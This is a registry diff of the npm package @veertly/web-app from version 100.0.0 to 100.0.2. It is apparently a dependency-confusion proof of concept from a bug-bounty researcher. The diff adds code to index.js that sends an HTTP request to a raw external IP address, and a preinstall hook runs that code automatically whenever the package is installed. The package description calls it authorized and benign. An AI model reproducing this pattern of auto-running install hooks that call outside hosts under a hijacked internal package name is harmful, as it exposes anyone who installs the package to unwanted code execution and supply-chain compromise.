@veertly/web-app 100.0.0 → 100.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +4 -1
  2. package/package.json +3 -3
package/index.js CHANGED
@@ -1 +1,4 @@
1
- // Security Research PoC - Neutralized
1
+ const http = require('http');
2
+
3
+ http.get('http://13.50.241.66:8080/poc-Swisscom-Abuelkhair').on('error', (err) => {
4
+ });
package/package.json CHANGED
@@ -1,11 +1,11 @@
1
1
  {
2
2
  "name": "@veertly/web-app",
3
- "version": "100.0.0",
4
- "description": "Security Research for Swisscom / Veertly",
3
+ "version": "100.0.2",
4
+ "description": "Authorized security research PoC for Swisscom/Veertly Bug Bounty program. Strictly benign. Contact: your_email@example.com",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "preinstall": "node index.js"
8
8
  },
9
- "author": "YourName",
9
+ "author": "Abuelkhair_PoC",
10
10
  "license": "ISC"
11
11
  }